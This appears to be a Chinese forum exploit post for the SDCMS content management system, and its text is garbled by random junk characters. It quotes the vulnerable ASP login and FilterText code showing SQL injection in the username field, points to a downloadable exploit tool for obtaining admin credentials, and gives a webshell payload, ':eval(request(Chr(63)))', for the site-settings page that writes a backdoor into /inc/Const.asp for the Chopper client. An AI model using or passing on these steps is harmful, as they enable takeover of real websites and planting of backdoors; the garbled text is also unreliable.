作者:T00LS 鬼哥7 _; G9 @& R# k: k# r
漏洞文件:后台目录/index.asp* Y: q( R3 Q$ \# }- R9 }
" r) K* m$ d' s; B s0 VSub Check; b4 \) o. @ y" e
Dim username,password,code,getcode,Rs
- D7 P1 Y- Q. N0 s, h, s IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
# k) Q# I7 A2 R! {% m username=FilterText(Trim(Request.Form("username")),1)1 ?3 D% q0 o2 E8 f9 c6 U/ g! h
password=FilterText(Trim(Request.Form("password")),1)( f8 L) Q8 |# T/ X2 Z0 |6 V4 L
code=Trim(Request.Form("yzm"))
& B6 @; z5 ]5 T+ t0 l: g getcode=Session("SDCMSCode")
0 f" c8 i \8 I IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died' K2 O% @. @2 d7 r: R
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied% A/ y5 n. \' u, H# x9 C* C- _
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied; U6 c' r$ Y: G5 p
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied0 P2 j0 h; F/ m! [$ {8 H
IF username="" or password="" Then
" P% \8 D2 l* X' K0 p1 f0 M Echo "用户名或密码不能为空" ied
4 i5 Q9 ?! K. ]% e E Else
% _* O2 F5 ^6 f& z; ^* W% K Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'"): A' V( C9 X. }/ n% a9 e
IF Rs.Eof Then
. _3 |) F9 ]! ^8 C9 Y AddLog username,GetIp,"登录失败",1' a! \1 H4 V. I7 F
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"; U6 n! I/ c1 h% m5 o$ l: b
Else" l3 S: ]5 ?% L1 f
Add_Cookies "sdcms_id",Rs(0)+ n+ v# L' Z ?7 G8 ? {
Add_Cookies "sdcms_name",username# M) O @ t! f$ ]7 U1 h
Add_Cookies "sdcms_pwd",Rs(2)% j7 ?) U0 J9 Q
Add_Cookies "sdcms_admin",Rs(3)% T4 y1 X# f# w
Add_Cookies "sdcms_alllever",Rs(4)5 K; F/ O, M+ [5 F: f6 ^( ?. R
Add_Cookies "sdcms_infolever",Rs(5)
2 ^6 ^# O% A8 U" l: H; T Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
1 X* {9 V# ^) Q4 Q3 i7 r AddLog username,GetIp,"登录成功",1- ]5 G6 r2 n+ Y6 R6 u1 u/ N% z) u
'自动删除30天前的Log记录
' W" p. s" P. L4 o IF Sdcms_DataType Then
6 R" G8 H" A' i8 Z2 l/ ^ Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
. E b& h5 m& u( G0 v2 E Else
+ ]. U6 m5 Q5 K! L; j y/ W Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")& y, ^. E# t% N
End IF4 B; ~1 K$ g% U0 M; G8 M
Go("sdcms_index.asp")
9 _; L+ ^- M) @% L- T End IF
7 n* B4 j, w2 T Rs.Close
4 E, Y% R% n M" C7 x Set Rs=Nothing
* [- G9 V( C. p% H/ Q End IF
' O+ B* z9 x! [; g8 B; G. NEnd Sub
2 f2 b% z: A: p" B
/ ?; I9 W: i/ f5 d- N’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码9 D$ Q7 q- E, K J
. N* Y# ~& F# }; H. G; j6 Q6 k9 s$ LFunction FilterText(ByVal t0,ByVal t1)+ o" N0 c3 \$ f# v/ K
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function9 U4 ^: R9 \% c5 V {( s$ o
t0=Trim(t0)
1 a1 Y! {0 C! G Select Case t1
4 z2 f# F( v. N; y$ Y/ f, @ Case "1"5 u# ?- h2 c# W! {/ L' ~1 m% T
t0=Replace(t0,Chr(32),"")
# u% p2 y# ~# y6 K) J t0=Replace(t0,Chr(13),"")/ \1 v' q( {3 N6 G0 v8 f: h
t0=Replace(t0,Chr(10)&Chr(10),"")
* ?7 G0 b; h3 U8 s t0=Replace(t0,Chr(10),"")8 M! a: n4 c; _/ P7 m* @
Case "2"$ J/ j( s; n3 Q" `( ?
t0=Replace(t0,Chr(8),"")'回格
7 P# o/ U+ o8 _$ C) K3 s8 { q% t t0=Replace(t0,Chr(9),"")'tab(水平制表符)
- j; t& U. O2 l* U t0=Replace(t0,Chr(10),"")'换行
& O" D$ \8 k" m4 ]& X% X t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
5 ~; O) B3 R. m. N- M& J) B t0=Replace(t0,Chr(12),"")'换页6 e. T, U7 d; w" g5 R4 O
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合& ~) h. I* T1 c7 {, w6 B8 V% H- E2 ?
t0=Replace(t0,Chr(22),"")
% @5 E. F. J& |+ B5 a" Q: n" J t0=Replace(t0,Chr(32),"")'空格 SPACE
5 O* K3 q- ~3 c. H4 ~0 B t0=Replace(t0,Chr(33),"")'!
* {' G4 V+ m8 i! B. [( @/ x5 Y t0=Replace(t0,Chr(34),"")'"
% l- {) {1 G$ b* i! M7 D t0=Replace(t0,Chr(35),"")'#4 I, M. ]7 I9 h- q W- x3 [
t0=Replace(t0,Chr(36),"")'$
7 C; Y# Y+ r: [) G t0=Replace(t0,Chr(37),"")'%3 B! A! x) B1 E# f' r
t0=Replace(t0,Chr(38),"")'&* p x4 B* j& i
t0=Replace(t0,Chr(39),"")''$ c5 _0 f! u7 i. X( ?/ b- M* y3 f
t0=Replace(t0,Chr(40),"")'(! t1 G- C9 L* B3 E- _, m; z/ D/ _
t0=Replace(t0,Chr(41),"")')9 y2 z* Q+ M1 A$ v1 p, f5 H. H8 b; }
t0=Replace(t0,Chr(42),"")'*
1 d8 i/ |' ~2 o% Z: |- {9 p t0=Replace(t0,Chr(43),"")'+. N3 `0 _; E* I$ p
t0=Replace(t0,Chr(44),"")',
4 D$ l2 G" r9 A) P Y/ X0 |: ^ t0=Replace(t0,Chr(45),"")'-! }& k; O' g" P9 C) E) f) d+ e
t0=Replace(t0,Chr(46),"")'.
! b; O( J- g$ q: J8 y8 n t0=Replace(t0,Chr(47),"")'/+ `* |) F' z. ]8 H0 B
t0=Replace(t0,Chr(58),"")':) h7 e+ J! `% n% ]
t0=Replace(t0,Chr(59),"")';
5 B) m& z- [; J/ o0 K' i$ A0 K, @% \ t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
3 P" V- d, n+ d& y) F t0=Replace(t0,Chr(63),"")'?8 v, W. M7 r: {) A# @
t0=Replace(t0,Chr(64),"")'@
* e2 p( `, x0 `& ~3 \ t0=Replace(t0,Chr(91),"")'\9 E; P& K9 f n: w( b
t0=Replace(t0,Chr(92),"")'\
7 S0 N5 V) j! T, ?! k$ x t0=Replace(t0,Chr(93),"")']
( Q& U4 Q8 o5 J; ~9 E# P$ b3 | t0=Replace(t0,Chr(94),"")'^
( d; N0 E, m% X6 V9 k t0=Replace(t0,Chr(95),"")'_
4 r( Q% l d/ ]" `- R t0=Replace(t0,Chr(96),"")'`
6 n2 W+ U% [1 a+ i2 E! e) q) f( M t0=Replace(t0,Chr(123),"")'{
6 Y; U8 y2 Q6 L6 J" V t0=Replace(t0,Chr(124),"")'|
' y1 {. \( ?. l) g6 T# { t0=Replace(t0,Chr(125),"")'}; L% K4 V0 \+ s# j6 B2 p
t0=Replace(t0,Chr(126),"")'~, Z6 q, D z7 M3 V3 F- K5 c
Case Else2 V/ z, T5 K/ ?& C" ~, H; z
t0=Replace(t0, "&", "&")
3 W5 a! }1 y N; m t0=Replace(t0, "'", "'")
2 q& X& c0 E f; a0 _0 n+ L& _ t0=Replace(t0, """", """)
$ Y. X" t) E# {6 T+ j5 O- [ t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
2 ~7 k9 W% s9 x | N End Select
0 B" x+ |$ |% f# E: M7 I; r IF Instr(Lcase(t0),"expression")>0 Then+ d+ P: a1 K: k t" t
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)) q$ ?) d/ c% Q9 ]
End If5 E! [0 j* |. S
FilterText=t07 @0 A$ y, e/ ]5 {* O2 `& Y& H5 P N
End Function d1 O: t/ d9 j: Y
$ E5 L' Z9 }/ A4 u# j2 a* R
看到没。直接参数是1 只过滤( b" I3 p7 {5 t# J
t0=Replace(t0,Chr(32)," ")
9 @: V. |) S) X! ` t0=Replace(t0,Chr(13),""), p, K& A' R/ J* w
t0=Replace(t0,Chr(10)&Chr(10),"
8 C* ]' N: [ Z")
) K+ D3 _7 ?9 ` t0=Replace(t0,Chr(10),"
, f& r/ [) o" p/ O2 P p8 o: K")
$ {1 q, K/ A+ B5 y/ l4 h漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
/ o9 n/ H& W {' B! B1 B k5 PEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP1 ?0 U% m# n# t
$ E" V6 J; q1 @8 n3 k4 e, ~测试:# Q) g; J) d w' |: p& U+ F9 [
( Z( k, F/ W3 X, d2 v( @, V" T$ [5 e# h
现在输入工具上验证码,然后点OK
9 |' `- q7 u, h( a. Z( M+ X" c) L ~3 Y& @# v+ C
. Q, O6 E0 m, |; H. V
看到我们直接进入后台管理界面了,呵呵!
5 v5 y8 Z6 @% q8 k. D' q
. B6 r2 _% n, ?$ H5 p, J! h1 Q8 }2 d5 s( ~
( ~# v6 F7 B" W! R0 T
这样直接进入后台了。。。。* H5 W w5 q! M$ r o) G
z/ Q! Z/ a6 r5 D* ?
P; y, A7 P3 E) j
5 k7 o6 t, d9 s2 hSDCMS提权:2 _/ ^$ \0 ?' h N
$ b7 } u+ H: n O6 H2 l/ D
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
6 B1 y# E+ X1 ~$ X# g* |) a/ n5 @
% C) \- R8 T/ c/ l8 N" d: v# L
4 e5 B X* A4 l! { ~# sOK,现在用菜刀连接下!3 `8 p% s- {* Y8 a+ p
! T- i" r# S( z9 J5 b5 `. C9 t9 H1 j( ^( E) D+ a8 p
8 T2 l% l/ T0 w' C* X6 Z # g- o+ [- Y, |# @" i
2 Y! u# r: p0 R K8 ]
|